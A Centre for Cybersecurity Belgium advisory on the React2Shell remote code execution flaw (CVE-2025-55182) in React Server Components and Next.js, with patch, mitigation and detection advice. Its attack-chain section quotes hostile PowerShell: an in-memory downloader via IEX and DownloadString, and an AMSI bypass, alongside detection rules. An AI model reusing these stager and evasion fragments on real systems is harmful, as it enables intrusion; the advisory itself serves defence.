Initiatieven voor
Als nationale autoriteit voor cyberveiligheid heeft het CCB verschillende initiatieven ontwikkeld voor specifieke doelgroepen die hier worden gepresenteerd.
Warning: Critical vulnerability in React Server Components can lead to unauthenticated remote code execution (RCE), Patch Immediately!
Image
Gepubliceerd : 04/12/2025
- Last update: 07/12/2025
- Affected software:
→ React Server Components versions 19.0, 19.1.0, 19.1.1 and 19.2.0
→ Next.js- Type: Remote Code Execution
- CVE/CVSS
→ CVE-2025-55182: CVSS 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
→ CVE-2025-66478: CVSS 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Sources
React advisory - https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Next.js advisory - https://nextjs.org/blog/CVE-2025-66478
Detection surface scanner - https://github.com/fatguru/CVE-2025-55182-scanner
Greynoise - https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far
Risks
In December 2025, React published an advisory regarding an unauthenticated remote code execution vulnerability affecting React Server Components, related packages, and downstream technology.
CVE-2025-55182, widely known as "React2Shell" is actively exploited. Threat actors would likely attempt to weaponize CVE-2025-55182, as apps are vulnerable even if they support but do not use React Server Components. The significant downstream impact of this vulnerability makes it attractive to threat actors, as this technology is widely used across numerous web applications.
Immediate action required. Failure to immediately apply vendor-supplied patches makes the system a high-value target for threat actors, potentially resulting in full system compromise, data exfiltration, credential theft, or the staging of ransomware or botnet deployment. This vulnerability represents a direct and severe business risk to the confidentiality, integrity, and availability of affected production systems.
Description
CVE-2025-55182 is a flaw in the way React decodes payloads sent to React Server Function endpoints. An unauthenticated attacker could craft a malicious HTTP request to any Server Function endpoint that, when deserialized by React, achieves remote code execution on the server.
The vulnerability is present in specific versions (19.0, 19.1.0, 19.1.1 and 19.2.0) as well as in three packages:
- react-server-dom-webpack
- react-server-dom-parcel
- react-server-dom-turbopack
Note that even if an app does not implement any React Server Function endpoints, it may still be vulnerable as long as the app supports React Server Components. In other words, there is a significant downstream impact where an app is vulnerable if it uses a framework, bundler or bunder plugin that supports React Server Components.
Next.js introduced another CVE identifier – CVE-2025-66478 – for the same vulnerability in order to track downstream impacts.
Observed exploitation follows a standard, high-throughput, automated attack chain:
- Initial Access & Proof-of-Execution (PoE): Automated scanners utilize publicly available Proof-of-Concept (PoC) code. They first validate successful RCE using "cheap math" PowerShell probes, such as powershell -c "40138*41979". This technique confirms execution capability with minimal endpoint artifacts.
- Payload Staging: Upon confirmation, attackers deploy encoded PowerShell stagers, typically using the format powershell -enc . This executes an in-memory downloader via primitives like IEX (New-Object System.Net.Webclient).DownloadString(...).
- Defense Evasion: The second-stage payload often attempts to bypass host-based security tools by using reflection to set the AMSI bypass primitive: System.Management.Automation.AmsiUtils.amsiInitFailed = $true.
- Final Objective: The compromised system is then used for various commodity post-exploitation activities.
Recommended Actions
Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority after thorough testing.
React indicates in their advisory that patching depends on the software used. Read the advisory to verify which version to upgrade – or in certain cases, to downgrade – to: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Mitigate
Network Perimeter Defense: Deploy real-time threat intelligence-sourced blocklists to prevent opportunistic IP addresses from compromising your perimeter. This measure can immediately reduce exposure to mass-scanning and automated attacks associated with this vulnerability.
- Principle of Least Privilege: Ensure that the processes running React Server Components operate with the minimum necessary privileges to reduce the potential impact of successful RCE.
Monitor/Detect
The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity and ensure a swift response in case of an intrusion.
A Python tool was created to detect React Server Components endpoints that may be exposed to CVE-2025-55182: https://github.com/fatguru/CVE-2025-55182-scanner Please note that this tool was not tested by the CCB.
Grenoise analysed automated attack patterns and added extra recommended actions to their blog : https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far
Endpoint Detection (PowerShell): Monitor and alert on high-signal, low-regret PowerShell command-line primitives:
- Alert on any execution of powershell.exe or pwsh.exe combined with both -enc or -EncodedCommand AND either DownloadString( or IEX.
- Alert on any script block (Windows Event ID 4104) containing any two of the AMSI bypass components: System.Management.Automation.AmsiUtils, amsiInitFailed, GetField, NonPublic,Static, or SetValue.
- Aggregate detection on repeated powershell -c "*" across a short window, as this is a strong indicator of exploit validation.
Network Detection (Traffic Composition): Since this activity is overwhelmingly automation-heavy, defenders should look for network patterns consistent with scanners and botnets:
-
User-Agents: Monitor HTTP requests for highly specific or automation-heavy User-Agents, such as Go-http-client/1.1, those containing Assetnote/1.0.0, or aiohttp and python-requests.
-
Infrastructure: Block or alert on traffic originating from infrastructure known to be associated with opportunistic exploitation, including newly observed IP addresses and known VPS/proxy pool ranges that are exhibiting rapid churn.
-
Fingerprinting: Utilize network fingerprinting (e.g., JA4T/JA4H) to detect highly concentrated traffic clusters associated with the exploitation attempts. Specifically, monitor for the top observed pairs:
- 42340_2-4-8-1-3_1460_11 + po11nn060000_3865ae1cc1d9_...
- 64240_2-1-3-1-1-4_1400_8 + po10nn090000_75eeec6218a0_...
- 42340_2-4-8-1-3_1460_11 + po11nn10enus_38148d6b7d75_...
- 42340_2-4-8-1-3_1460_10 + po11nn090000_3343762cd6d7_...
In case of an intrusion, you can report an incident via https://ccb.belgium.be/en/cert/report-incident.
While patching appliances or software to the newest version may protect against future exploitation, it does not remediate historic compromise.
References
Cyber Security News article - https://cybersecuritynews.com/scanner-tool-reactjs-and-next-js/
Vercel advisory - https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp
Amazon AWS (exploitation reference) - https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/